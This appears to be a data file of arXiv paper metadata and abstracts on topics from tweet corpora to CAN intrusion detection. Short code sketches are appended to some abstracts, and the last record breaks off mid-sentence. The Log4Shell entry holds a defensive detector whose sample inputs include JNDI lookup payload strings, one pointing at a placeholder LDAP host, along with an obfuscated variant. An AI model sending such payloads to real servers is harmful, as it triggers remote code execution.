Column schema: id (string, 9–10 chars) · submitter (string, 2–52 chars, nullable) · authors (string, 4–6.51k chars) · title (string, 4–246 chars) · comments (string, 1–523 chars, nullable) · journal-ref (string, 4–345 chars, nullable) · doi (string, 11–120 chars, nullable) · report-no (string, 2–243 chars, nullable) · categories (string, 5–98 chars) · license (string, 9 classes) · abstract (string, 33–3.33k chars) · versions (list) · update_date (timestamp[s]) · authors_parsed (list) · prediction (string, 1 class) · probability (float64, 0.95–1)

id | submitter | authors | title | comments | journal-ref | doi | report-no | categories | license | abstract | versions | update_date | authors_parsed | prediction | probability
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2009.00596
|
Salvatore Giorgi
|
Salvatore Giorgi, Sharath Chandra Guntuku, McKenzie
Himelein-Wachowiak, Amy Kwarteng, Sy Hwang, Muhammad Rahman, and Brenda
Curtis
|
Twitter Corpus of the #BlackLivesMatter Movement And Counter Protests:
2013 to 2021
|
Published at the 16th International AAAI Conference on Web and Social
Media (ICWSM) 2022
| null | null | null |
cs.SI cs.CL
|
http://creativecommons.org/licenses/by-nc-sa/4.0/
|
Black Lives Matter (BLM) is a decentralized social movement protesting
violence against Black individuals and communities, with a focus on police
brutality. The movement gained significant attention following the killings of
Ahmaud Arbery, Breonna Taylor, and George Floyd in 2020. The #BlackLivesMatter
social media hashtag has come to represent the grassroots movement, with
similar hashtags counter-protesting the BLM movement, such as #AllLivesMatter
and #BlueLivesMatter. We introduce a data set of 63.9 million tweets from 13.0
million users from over 100 countries which contain one of the following
keywords: BlackLivesMatter, AllLivesMatter, and BlueLivesMatter. This data set
contains all currently available tweets from the beginning of the BLM movement
in 2013 to 2021. We summarize the data set and show temporal trends in use of
both the BlackLivesMatter keyword and keywords associated with counter
movements. Additionally, for each keyword, we create and release a set of
Latent Dirichlet Allocation (LDA) topics (i.e., automatically clustered groups
of semantically co-occurring words) to aid researchers in identifying linguistic
patterns across the three keywords.
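As a sketch of how such per-keyword topics can be derived, here is a minimal LDA pipeline with scikit-learn; the example tweets, preprocessing, and parameters are placeholders, not the released topic models.

```python
# Minimal sketch: fit LDA topics for tweets matching one keyword.
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation

tweets = [
    "protest downtown tonight for justice and accountability",
    "support our police officers and their families",
    "march for equal rights and police reform",
]  # stand-in for tweets containing one keyword, e.g. BlackLivesMatter

vec = CountVectorizer(stop_words="english")
X = vec.fit_transform(tweets)
lda = LatentDirichletAllocation(n_components=2, random_state=0).fit(X)

terms = vec.get_feature_names_out()
for k, topic in enumerate(lda.components_):
    top = [terms[i] for i in topic.argsort()[::-1][:5]]
    print(f"topic {k}:", ", ".join(top))
```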
|
[
{
"version": "v1",
"created": "Tue, 1 Sep 2020 17:37:39 GMT"
},
{
"version": "v2",
"created": "Mon, 28 Sep 2020 16:20:16 GMT"
},
{
"version": "v3",
"created": "Tue, 7 Jun 2022 15:45:39 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Giorgi",
"Salvatore",
""
],
[
"Guntuku",
"Sharath Chandra",
""
],
[
"Himelein-Wachowiak",
"McKenzie",
""
],
[
"Kwarteng",
"Amy",
""
],
[
"Hwang",
"Sy",
""
],
[
"Rahman",
"Muhammad",
""
],
[
"Curtis",
"Brenda",
""
]
] |
new_dataset
| 0.994865 |
2104.07091
|
Mingda Chen
|
Mingda Chen, Zewei Chu, Sam Wiseman, Kevin Gimpel
|
SummScreen: A Dataset for Abstractive Screenplay Summarization
|
ACL 2022
| null | null | null |
cs.CL
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We introduce SummScreen, a summarization dataset comprising pairs of TV
series transcripts and human-written recaps. The dataset provides a challenging
testbed for abstractive summarization for several reasons. Plot details are
often expressed indirectly in character dialogues and may be scattered across
the entirety of the transcript. These details must be found and integrated to
form the succinct plot descriptions in the recaps. Also, TV scripts contain
content that does not directly pertain to the central plot but rather serves to
develop characters or provide comic relief. This information is rarely
contained in recaps. Since characters are fundamental to TV series, we also
propose two entity-centric evaluation metrics. Empirically, we characterize the
dataset by evaluating several methods, including neural models and those based
on nearest neighbors. An oracle extractive approach outperforms all benchmarked
models according to automatic metrics, showing that the neural models are
unable to fully exploit the input transcripts. Human evaluation and qualitative
analysis reveal that our non-oracle models are competitive with their oracle
counterparts in terms of generating faithful plot events and can benefit from
better content selectors. Both oracle and non-oracle models generate unfaithful
facts, suggesting future research directions.
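To make the "oracle extractive" upper bound concrete, a hedged sketch: greedily select transcript lines that maximize unigram F1 against the reference recap. The paper's oracle uses its own metric and setup; this only illustrates the general idea.

```python
import re

def tokens(text):
    # lowercase word tokens; a crude stand-in for real tokenization
    return set(re.findall(r"[a-z]+", text.lower()))

def unigram_f1(candidate, reference):
    c, r = tokens(candidate), tokens(reference)
    overlap = len(c & r)
    if overlap == 0:
        return 0.0
    p, rec = overlap / len(c), overlap / len(r)
    return 2 * p * rec / (p + rec)

def oracle_extract(lines, recap, budget=2):
    chosen = []
    while len(chosen) < budget:
        best = max((l for l in lines if l not in chosen),
                   key=lambda l: unigram_f1(" ".join(chosen + [l]), recap),
                   default=None)
        if best is None:
            break
        chosen.append(best)
    return chosen

lines = ["JOHN: I hid the letter.", "MARY: Dinner is ready.",
         "JOHN: She must never find it."]
print(oracle_extract(lines, "John hides a letter from Mary"))
```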
|
[
{
"version": "v1",
"created": "Wed, 14 Apr 2021 19:37:40 GMT"
},
{
"version": "v2",
"created": "Thu, 10 Mar 2022 00:28:54 GMT"
},
{
"version": "v3",
"created": "Mon, 6 Jun 2022 19:02:30 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Chen",
"Mingda",
""
],
[
"Chu",
"Zewei",
""
],
[
"Wiseman",
"Sam",
""
],
[
"Gimpel",
"Kevin",
""
]
] |
new_dataset
| 0.99986 |
2105.14388
|
Paul G\"olz
|
Narges Ahani, Paul Gölz, Ariel D. Procaccia, Alexander Teytelboym
and Andrew C. Trapp
|
Dynamic Placement in Refugee Resettlement
|
Expanded related work, added experiments with bootstrapped arrivals
in Section 7.2, added various experiments in the appendix
| null |
10.1145/3465456.3467534
| null |
cs.GT physics.soc-ph
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Employment outcomes of resettled refugees depend strongly on where they are
placed inside the host country. Each week, a resettlement agency is assigned a
batch of refugees by the United States government. The agency must place these
refugees in its local affiliates, while respecting the affiliates' yearly
capacities. We develop an allocation system that suggests where to place an
incoming refugee, in order to improve total employment success. Our algorithm
is based on two-stage stochastic programming and achieves over 98 percent of
the hindsight-optimal employment, compared to under 90 percent for current
greedy-like approaches. This dramatic improvement persists even when we
incorporate a vast array of practical features of the refugee resettlement
process including indivisible families, batching, and uncertainty with respect
to the number of future arrivals. Our algorithm is now part of the Annie MOORE
optimization software used by a leading American refugee resettlement agency.
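A toy illustration of the scenario-based reasoning behind such a two-stage approach (not the paper's actual stochastic program): score each feasible affiliate by the case's predicted employment probability plus a Monte Carlo estimate of the value of the capacity left for future arrivals. All names and numbers below are hypothetical.

```python
import numpy as np

rng = np.random.default_rng(0)

N_AFFILIATES = 5
capacity = np.array([4, 3, 5, 2, 6])   # remaining yearly capacities (toy)

def sample_future_cases(n):
    # predicted employment probability of each future case at each affiliate
    return rng.uniform(0.1, 0.9, size=(n, N_AFFILIATES))

def place_case(case_probs, capacity, n_scenarios=100, horizon=10):
    """Pick an affiliate: immediate value plus a Monte Carlo estimate of
    the value of the capacity left for future arrivals (second stage)."""
    best_a, best_val = None, -np.inf
    for a in range(N_AFFILIATES):
        if capacity[a] == 0:
            continue
        cap = capacity.copy()
        cap[a] -= 1
        future = 0.0
        for _ in range(n_scenarios):
            c, val = cap.copy(), 0.0
            for p in sample_future_cases(horizon):
                open_a = np.flatnonzero(c > 0)
                if open_a.size == 0:
                    break
                j = open_a[np.argmax(p[open_a])]  # greedy second-stage recourse
                val += p[j]
                c[j] -= 1
            future += val / n_scenarios
        if case_probs[a] + future > best_val:
            best_a, best_val = a, case_probs[a] + future
    return best_a

case = rng.uniform(0.1, 0.9, size=N_AFFILIATES)
print("suggested affiliate:", place_case(case, capacity))
```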
|
[
{
"version": "v1",
"created": "Sat, 29 May 2021 23:35:41 GMT"
},
{
"version": "v2",
"created": "Tue, 7 Jun 2022 02:49:52 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Ahani",
"Narges",
""
],
[
"Gölz",
"Paul",
""
],
[
"Procaccia",
"Ariel D.",
""
],
[
"Teytelboym",
"Alexander",
""
],
[
"Trapp",
"Andrew C.",
""
]
] |
new_dataset
| 0.994247 |
2110.13492
|
Viet-Anh Nguyen
|
Viet-Anh Nguyen, Anh H. T. Nguyen, and Andy W. H. Khong
|
TUNet: A Block-online Bandwidth Extension Model based on Transformers
and Self-supervised Pretraining
|
Published as a conference paper at ICASSP 2022, 5 pages, 4 figures, 3
tables
| null |
10.1109/ICASSP43922.2022.9747699
| null |
cs.LG cs.SD eess.AS
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We introduce a block-online variant of the temporal feature-wise linear
modulation (TFiLM) model to achieve bandwidth extension. The proposed
architecture simplifies the UNet backbone of the TFiLM to reduce inference time
and employs an efficient transformer at the bottleneck to alleviate performance
degradation. We also utilize self-supervised pretraining and data augmentation
to enhance the quality of bandwidth extended signals and reduce the sensitivity
with respect to downsampling methods. Experimental results on the VCTK dataset
show that the proposed method outperforms several recent baselines in both
intrusive and non-intrusive metrics. Pretraining and filter augmentation also
help stabilize and enhance the overall performance.
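For readers unfamiliar with TFiLM, a minimal PyTorch sketch of the core idea, temporal feature-wise linear modulation: max-pool features into blocks, run an RNN over the block sequence, and rescale each block with the RNN output. The sizes and the scaling-only form are simplifications of the published layer, not the TUNet implementation.

```python
import torch
import torch.nn as nn

class TFiLM(nn.Module):
    """Sketch of temporal feature-wise linear modulation (scaling only)."""
    def __init__(self, channels, block_size):
        super().__init__()
        self.block_size = block_size
        self.rnn = nn.LSTM(channels, channels, batch_first=True)

    def forward(self, x):                        # x: (batch, channels, time)
        b, c, t = x.shape
        nb = t // self.block_size                # assumes time % block_size == 0
        blocks = x.view(b, c, nb, self.block_size)
        pooled = blocks.max(dim=-1).values       # (b, c, nb)
        scale, _ = self.rnn(pooled.transpose(1, 2))   # (b, nb, c)
        scale = scale.transpose(1, 2).unsqueeze(-1)   # (b, c, nb, 1)
        return (blocks * scale).reshape(b, c, t)

print(TFiLM(16, 4)(torch.randn(2, 16, 32)).shape)  # torch.Size([2, 16, 32])
```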
|
[
{
"version": "v1",
"created": "Tue, 26 Oct 2021 08:43:46 GMT"
},
{
"version": "v2",
"created": "Wed, 5 Jan 2022 12:59:28 GMT"
},
{
"version": "v3",
"created": "Thu, 6 Jan 2022 17:41:26 GMT"
},
{
"version": "v4",
"created": "Thu, 31 Mar 2022 04:05:46 GMT"
},
{
"version": "v5",
"created": "Tue, 7 Jun 2022 08:46:20 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Nguyen",
"Viet-Anh",
""
],
[
"Nguyen",
"Anh H. T.",
""
],
[
"Khong",
"Andy W. H.",
""
]
] |
new_dataset
| 0.996745 |
2204.05762
|
Ruwayda Alharbi
|
Ruwayda Alharbi, Ondřej Strnad, Tobias Klein, Ivan Viola
|
Nanomatrix: Scalable Construction of Crowded Biological Environments
| null | null | null | null |
cs.GR
|
http://creativecommons.org/licenses/by-sa/4.0/
|
We present a novel method for interactive construction and rendering of
extremely large molecular scenes, capable of representing multiple biological
cells at atomistic detail. Our method is tailored for scenes that are
procedurally constructed based on a given set of building rules. Rendering of
large scenes normally requires the entire scene available in-core, or
alternatively, it requires out-of-core management to load data into the memory
hierarchy as a part of the rendering loop. Instead of out-of-core memory
management, we propose to procedurally generate the scene on-demand on the fly.
The key idea is a positional- and view-dependent procedural scene-construction
strategy, where only a fraction of the atomistic scene around the camera is
available in the GPU memory at any given time. The atomistic detail is
populated into a uniform-space partitioning using a grid that covers the entire
scene. Most of the grid cells are not filled with geometry; only those
potentially seen by the camera are populated. The atomistic detail is
populated in a compute shader and its representation is connected with
acceleration data structures for hardware ray-tracing of modern GPUs. Objects
which are far away, where atomistic detail is not perceivable from a given
viewpoint, are represented by a triangle mesh mapped with a seamless texture,
generated from the rendering of geometry from atomistic detail. The algorithm
consists of two pipelines, the construction compute pipeline and the rendering
pipeline, which work together to render molecular scenes at an atomistic
resolution far beyond the limit of the GPU memory containing trillions of
atoms. We demonstrate our technique on multiple models of SARS-CoV-2 and the
red blood cell.
|
[
{
"version": "v1",
"created": "Tue, 12 Apr 2022 12:55:28 GMT"
},
{
"version": "v2",
"created": "Tue, 7 Jun 2022 06:45:56 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Alharbi",
"Ruwayda",
""
],
[
"Strnad",
"Ondřej",
""
],
[
"Klein",
"Tobias",
""
],
[
"Viola",
"Ivan",
""
]
] |
new_dataset
| 0.957556 |
2205.01306
|
Md Hasan Shahriar
|
Md Hasan Shahriar, Yang Xiao, Pablo Moriano, Wenjing Lou, and Y.
Thomas Hou
|
CANShield: Signal-based Intrusion Detection for Controller Area Networks
|
15 pages, 6 figures, A version of this paper is accepted by escar USA
2022
| null | null | null |
cs.CR cs.LG
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
Modern vehicles rely on a fleet of electronic control units (ECUs) connected
through controller area network (CAN) buses for critical vehicular control.
However, with the expansion of advanced connectivity features in automobiles
and the elevated risks of internal system exposure, the CAN bus is increasingly
prone to intrusions and injection attacks. Ordinary injection attacks
disrupt the typical timing properties of the CAN data stream, and
rule-based intrusion detection systems (IDS) can easily detect them. However,
advanced attackers can inject false data into the time-series sensory data
(signal), while looking innocuous by the pattern/frequency of the CAN messages.
Such attacks can bypass the rule-based IDS or any anomaly-based IDS built on
binary payload data. To make the vehicles robust against such intelligent
attacks, we propose CANShield, a signal-based intrusion detection framework for
the CAN bus. CANShield consists of three modules: a data preprocessing module
that handles the high-dimensional CAN data stream at the signal level and makes
them suitable for a deep learning model; a data analyzer module consisting of
multiple deep autoencoder (AE) networks, each analyzing the time-series data
from a different temporal perspective; and finally an attack detection module
that uses an ensemble method to make the final decision. Evaluation results on
two high-fidelity signal-based CAN attack datasets show the high accuracy and
responsiveness of CANShield in detecting a wide range of advanced intrusion
attacks.
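A heavily simplified sketch of the reconstruction-error principle such a data analyzer module builds on: train an autoencoder on benign signal windows and flag windows whose reconstruction error exceeds a benign-calibrated threshold. CANShield's actual design (multiple deep autoencoders over different temporal views plus an ensemble detector) is richer; the data here is synthetic.

```python
import numpy as np
from sklearn.neural_network import MLPRegressor

rng = np.random.default_rng(0)
benign = rng.normal(0.0, 1.0, size=(500, 20))  # flattened benign signal windows
attack = rng.normal(3.0, 1.0, size=(20, 20))   # windows with injected false data

ae = MLPRegressor(hidden_layer_sizes=(8,), max_iter=2000, random_state=0)
ae.fit(benign, benign)                         # autoencoder: reconstruct input

def recon_error(x):
    return ((ae.predict(x) - x) ** 2).mean(axis=1)

threshold = np.percentile(recon_error(benign), 99)  # calibrated on benign data
print("fraction of attack windows flagged:",
      (recon_error(attack) > threshold).mean())
```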
|
[
{
"version": "v1",
"created": "Tue, 3 May 2022 04:52:44 GMT"
},
{
"version": "v2",
"created": "Sun, 5 Jun 2022 16:10:42 GMT"
},
{
"version": "v3",
"created": "Tue, 7 Jun 2022 06:20:08 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Shahriar",
"Md Hasan",
""
],
[
"Xiao",
"Yang",
""
],
[
"Moriano",
"Pablo",
""
],
[
"Lou",
"Wenjing",
""
],
[
"Hou",
"Y. Thomas",
""
]
] |
new_dataset
| 0.997747 |
2205.02544
|
Raphael Hiesgen
|
Raphael Hiesgen, Marcin Nawrocki, Thomas C. Schmidt, Matthias
Wählisch
|
The Race to the Vulnerable: Measuring the Log4j Shell Incident
|
Proc. of Network Traffic Measurement and Analysis Conference (TMA
'22), camera ready
| null | null | null |
cs.CR
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Log4Shell is a critical remote-code-execution (RCE) vulnerability
that was disclosed to the public on December 10, 2021. It exploits a bug in the
widespread Log4j library. Any service that uses the library and exposes an
interface to the Internet is potentially vulnerable.
In this paper, we measure the rush of scanners during the two months after
the disclosure. We use several vantage points to observe both researchers and
attackers. For this purpose, we collect and analyze payloads sent by benign and
malicious communication parties, their origins, and churn. We find that the
initial rush of scanners quickly ebbed. Non-malicious scanners, in particular,
were active only in the days right after the disclosure. In contrast, malicious
scanners continue targeting the vulnerability.
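For intuition about what such scan payloads look like, a small illustrative filter for JNDI lookup strings, including one common obfuscation trick; the paper's measurement methodology is far broader than this.

```python
import re

# Two illustrative payload shapes: a plain JNDI lookup and a nested-lookup
# obfuscation. Real probes used many more protocols and tricks.
PATTERNS = [
    re.compile(r"\$\{jndi:(ldaps?|rmi|dns)://", re.IGNORECASE),
    re.compile(r"\$\{\$\{(?:lower|upper):j\}ndi", re.IGNORECASE),
]

def looks_like_log4shell(line: str) -> bool:
    return any(p.search(line) for p in PATTERNS)

print(looks_like_log4shell("GET /?x=${jndi:ldap://203.0.113.9/a}"))  # True
print(looks_like_log4shell("GET /?x=${${lower:j}ndi:ldap://e/a}"))   # True
print(looks_like_log4shell("GET /index.html HTTP/1.1"))              # False
```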
|
[
{
"version": "v1",
"created": "Thu, 5 May 2022 10:08:57 GMT"
},
{
"version": "v2",
"created": "Tue, 7 Jun 2022 13:56:20 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Hiesgen",
"Raphael",
""
],
[
"Nawrocki",
"Marcin",
""
],
[
"Schmidt",
"Thomas C.",
""
],
[
"Wählisch",
"Matthias",
""
]
] |
new_dataset
| 0.998196 |
2206.02260
|
Ekaterina Nepovinnykh Mrs
|
Ekaterina Nepovinnykh, Tuomas Eerola, Vincent Biard, Piia Mutka, Marja
Niemi, Heikki Kälviäinen, Mervi Kunnasranta
|
SealID: Saimaa ringed seal re-identification dataset
|
15 pages, 9 figures
| null | null | null |
cs.CV q-bio.PE
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
Wildlife camera traps and crowd-sourced image material provide novel
possibilities to monitor endangered animal species. However, the massive image
volumes that these methods produce are overwhelming for researchers to go
through manually, which calls for automatic systems to perform the analysis. The
analysis task that has gained the most attention is the re-identification of
individuals, as it allows, for example, to study animal migration or to
estimate the population size. The Saimaa ringed seal (Pusa hispida saimensis)
is an endangered subspecies found only in Lake Saimaa, Finland, and is one
of the few existing freshwater seal species. Ringed seals have permanent pelage
patterns that are unique to each individual which can be used for the
identification of individuals. Large variation in poses further exacerbated by
the deformable nature of seals together with varying appearance and low
contrast between the ring pattern and the rest of the pelage makes the Saimaa
ringed seal re-identification task very challenging, providing a good benchmark
to evaluate state-of-the-art re-identification methods. Therefore, we make our
Saimaa ringed seal image (SealID) dataset (N=57) publicly available for
research purposes. In this paper, the dataset is described, the evaluation
protocol for re-identification methods is proposed, and the results for two
baseline methods HotSpotter and NORPPA are provided. The SealID dataset has
been made publicly available.
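A generic sketch of the kind of ranking evaluation used for re-identification: rank gallery animals by cosine similarity to each query embedding and compute top-k accuracy. The embeddings below are random stand-ins; the official protocol ships with the dataset.

```python
import numpy as np

rng = np.random.default_rng(0)
gallery = rng.normal(size=(57, 128))                 # one embedding per seal
gallery_ids = np.arange(57)
queries = gallery[:10] + rng.normal(scale=0.1, size=(10, 128))
query_ids = gallery_ids[:10]

def topk_accuracy(q, q_ids, g, g_ids, k=5):
    q = q / np.linalg.norm(q, axis=1, keepdims=True)
    g = g / np.linalg.norm(g, axis=1, keepdims=True)
    ranked = np.argsort(-(q @ g.T), axis=1)[:, :k]   # k most similar per query
    return float(np.mean([qid in g_ids[r] for qid, r in zip(q_ids, ranked)]))

print("top-5 accuracy:", topk_accuracy(queries, query_ids, gallery, gallery_ids))
```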
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 20:35:32 GMT"
},
{
"version": "v2",
"created": "Tue, 7 Jun 2022 11:08:49 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Nepovinnykh",
"Ekaterina",
""
],
[
"Eerola",
"Tuomas",
""
],
[
"Biard",
"Vincent",
""
],
[
"Mutka",
"Piia",
""
],
[
"Niemi",
"Marja",
""
],
[
"Kälviäinen",
"Heikki",
""
],
[
"Kunnasranta",
"Mervi",
""
]
] |
new_dataset
| 0.999808 |
2206.02871
|
Alyssa Blackburn
|
Alyssa Blackburn, Christoph Huber, Yossi Eliaz, Muhammad S. Shamim,
David Weisz, Goutham Seshadri, Kevin Kim, Shengqi Hang, and Erez Lieberman
Aiden
|
Cooperation among an anonymous group protected Bitcoin during failures
of decentralization
|
12 pages main text, 6 main text figures; 76 total pages, 23 supplemental
figures
| null | null | null |
cs.GT cs.CY physics.soc-ph
|
http://creativecommons.org/licenses/by/4.0/
|
Bitcoin is a digital currency designed to rely on a decentralized, trustless
network of anonymous agents. Using a pseudonymous-address-linking procedure
that achieves >99% sensitivity and >99% specificity, we reveal that between
launch (January 3rd, 2009), and when the price reached $1 (February 9th, 2011),
most bitcoin was mined by only sixty-four agents. This was due to the rapid
emergence of Pareto distributions in bitcoin income, producing such extensive
resource centralization that almost all contemporary bitcoin addresses can be
connected to these top agents by a chain of six transactions. Centralization
created a social dilemma. Attackers could routinely exploit bitcoin via a "51%
attack", making it possible for them to repeatedly spend the same bitcoins. Yet
doing so would harm the community. Strikingly, we find that potential attackers
always chose to cooperate instead. We model this dilemma using an N-player
Centipede game in which anonymous players can choose to exploit, and thereby
undermine, an appreciating good. Combining theory and economic experiments, we
show that, even when individual payoffs are unchanged, cooperation is more
frequent when the game is played by an anonymous group. Although bitcoin was
designed to rely on a decentralized, trustless network of anonymous agents, its
early success rested instead on cooperation among a small group of altruistic
founders.
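The paper's pseudonymous-address-linking procedure is more sophisticated, but a classic building block for such analyses is the common-input-ownership heuristic, clustered with union-find; a self-contained sketch with hypothetical addresses:

```python
class DSU:
    """Union-find with path halving, used to merge address clusters."""
    def __init__(self):
        self.parent = {}
    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]
            x = self.parent[x]
        return x
    def union(self, a, b):
        self.parent[self.find(a)] = self.find(b)

# Hypothetical transactions, each listing its input addresses; co-signing
# inputs are assumed to share an owner (the classic heuristic).
transactions = [["addr1", "addr2"], ["addr2", "addr3"], ["addr4"]]

dsu = DSU()
for inputs in transactions:
    for a in inputs[1:]:
        dsu.union(inputs[0], a)

clusters = {}
for a in {a for tx in transactions for a in tx}:
    clusters.setdefault(dsu.find(a), []).append(a)
print(list(clusters.values()))  # addr1-3 end up in one cluster, addr4 alone
```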
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 19:54:21 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Blackburn",
"Alyssa",
""
],
[
"Huber",
"Christoph",
""
],
[
"Eliaz",
"Yossi",
""
],
[
"Shamim",
"Muhammad S.",
""
],
[
"Weisz",
"David",
""
],
[
"Seshadri",
"Goutham",
""
],
[
"Kim",
"Kevin",
""
],
[
"Hang",
"Shengqi",
""
],
[
"Aiden",
"Erez Lieberman",
""
]
] |
new_dataset
| 0.987804 |
2206.02894
|
Adam Caulfield
|
Adam Caulfield, Norrathep Rattanavipanon, Ivan De Oliveira Nunes
|
ASAP: Reconciling Asynchronous Real-Time Operations and Proofs of
Execution in Simple Embedded Systems
|
2022 59th ACM/IEEE Design Automation Conference (DAC)
| null | null | null |
cs.CR cs.AR
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Embedded devices are increasingly ubiquitous and their importance is hard to
overestimate. While they often support safety-critical functions (e.g., in
medical devices and sensor-alarm combinations), they are usually implemented
under strict cost/energy budgets, using low-end microcontroller units (MCUs)
that lack sophisticated security mechanisms. Motivated by this issue, recent
work developed architectures capable of generating Proofs of Execution (PoX)
for the correct/expected software in potentially compromised low-end MCUs. In
practice, this capability can be leveraged to provide "integrity from birth" to
sensor data, by binding the sensed results/outputs to an unforgeable
cryptographic proof of execution of the expected sensing process. Despite this
significant progress, current PoX schemes for low-end MCUs ignore the real-time
needs of many applications. In particular, security of current PoX schemes
precludes any interrupts during the execution being proved. We argue that lack
of asynchronous capabilities (i.e., interrupts within PoX) can obscure PoX
usefulness, as several applications require processing real-time and
asynchronous events. To bridge this gap, we propose, implement, and evaluate an
Architecture for Secure Asynchronous Processing in PoX (ASAP). ASAP is secure
under full software compromise, enables asynchronous PoX, and incurs less
hardware overhead than prior work.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 20:38:44 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Caulfield",
"Adam",
""
],
[
"Rattanavipanon",
"Norrathep",
""
],
[
"Nunes",
"Ivan De Oliveira",
""
]
] |
new_dataset
| 0.987275 |
2206.02971
|
Mayra Nuñez Lopez Dr.
|
Sofía de la Mora Tostado, Mayra Núñez-López, Esteban A.
Hernández-Vargas
|
Human Trafficking in Mexico: Data sources, Network Analysis and the
Limits of Dismantling Strategies
| null | null | null | null |
cs.SI math.OC
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Human trafficking is a heartless crime, and the second most
profitable crime in the world. Mexico's geographical position makes it a
country with high levels of human trafficking. Using the snowball sampling
method, the major contribution of this paper is the abstraction of the human
trafficking network on the southern border of Mexico. Based on a social network
analysis, it is identified that the criminal network is moderately centralized
(44.32%) and with medium density (0.401). Therefore, the network has minimal
cohesiveness and members may find it difficult to share information, money, or
products among themselves. To evaluate different dismantling strategies to
tackle the criminal organization, three algorithms are evaluated. We found that
the first actors to be removed are neither the most connected nor the most
peripheral, but the actors who are moderately connected to people of their kind
should be removed. In summary, this paper provides a significant step toward
quantitatively understanding human trafficking networks and evaluating the
limits of dismantling strategies.
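The two reported statistics are standard network measures; a sketch of computing them with networkx on a toy graph (the real edge list is not reproduced here):

```python
import networkx as nx

G = nx.Graph([(0, 1), (0, 2), (0, 3), (1, 2), (3, 4), (4, 5)])  # toy network

n = G.number_of_nodes()
degrees = [d for _, d in G.degree()]
# Freeman degree centralization for an undirected graph
centralization = sum(max(degrees) - d for d in degrees) / ((n - 1) * (n - 2))

print("density:", nx.density(G))
print("degree centralization:", centralization)
```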
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 02:22:07 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Tostado",
"Sofía de la Mora",
""
],
[
"Núñez-López",
"Mayra",
""
],
[
"Hernández-Vargas",
"Esteban A.",
""
]
] |
new_dataset
| 0.985077 |
2206.02982
|
Weiyi Lu
|
Xiaodi Sun, Sunny Rajagopalan, Priyanka Nigam, Weiyi Lu, Yi Xu,
Belinda Zeng, Trishul Chilimbi
|
DynaMaR: Dynamic Prompt with Mask Token Representation
| null | null | null | null |
cs.CL cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Recent research has shown that large language models pretrained using
unsupervised approaches can achieve significant performance improvement on many
downstream tasks. Typically, when adapting these language models to downstream
tasks, like a classification or regression task, we employ a fine-tuning
paradigm in which the sentence representation from the language model is input
to a task-specific head; the model is then fine-tuned end-to-end. However, with
the emergence of models like GPT-3, prompt-based fine-tuning has been proven to
be a successful approach for few-shot tasks. Inspired by this work, we study
discrete prompt technologies in practice. There are two issues that arise with
the standard prompt approach. First, it can overfit on the prompt template.
Second, it requires manual effort to formulate the downstream task as a
language model problem. In this paper, we propose an improvement to
prompt-based fine-tuning that addresses these two issues. We refer to our
approach as DynaMaR -- Dynamic Prompt with Mask Token Representation. Results
show that DynaMaR can achieve an average improvement of 10% in few-shot
settings and improvement of 3.7% in data-rich settings over the standard
fine-tuning approach on four e-commerce applications.
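For context, a sketch of the standard (static) prompt-based classification that DynaMaR improves on: fill a mask token in a handcrafted template and read off verbalizer-word probabilities. The model name, template, and verbalizer are illustrative; this is not the DynaMaR method itself.

```python
from transformers import pipeline

fill = pipeline("fill-mask", model="bert-base-uncased")

review = "the battery died after two days"
prompt = f"{review}. overall it was [MASK]."          # handcrafted template
verbalizer = {"good": "positive", "bad": "negative"}  # label words

scores = {c["token_str"]: c["score"]
          for c in fill(prompt, targets=list(verbalizer))}
label_word = max(scores, key=scores.get)
print(verbalizer[label_word])                         # expected: negative
```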
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 02:54:36 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Sun",
"Xiaodi",
""
],
[
"Rajagopalan",
"Sunny",
""
],
[
"Nigam",
"Priyanka",
""
],
[
"Lu",
"Weiyi",
""
],
[
"Xu",
"Yi",
""
],
[
"Zeng",
"Belinda",
""
],
[
"Chilimbi",
"Trishul",
""
]
] |
new_dataset
| 0.994138 |
2206.02997
|
Deng Bowen
|
Bowen Deng and Dongchang Liu
|
TadML: A fast temporal action detection with Mechanics-MLP
|
8 pages,3 figures
| null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Temporal Action Detection (TAD) is a crucial but challenging task in video
understanding. It aims to detect both the type and the start-end frames of each
action instance in a long, untrimmed video. Most current models adopt both RGB
and optical-flow streams for the TAD task. Thus, original RGB frames must be
converted manually into optical-flow frames, with additional computation and
time cost, which is an obstacle to real-time processing. At present, many
models adopt two-stage strategies, which slow down inference and require
complicated tuning of proposal generation. By comparison, we propose a
one-stage, anchor-free temporal localization method with the RGB stream only,
in which a novel Newtonian \emph{Mechanics-MLP} architecture is established. It
has accuracy comparable to all existing state-of-the-art models, while
surpassing the inference speed of these methods by a large margin: the typical
inference speed in this paper is an astounding 4.44 videos per second on
THUMOS14. In applications, because there is no need to convert optical flow,
inference will be even faster. This also shows that \emph{MLP} has great
potential in downstream tasks such as TAD. The source code is available at
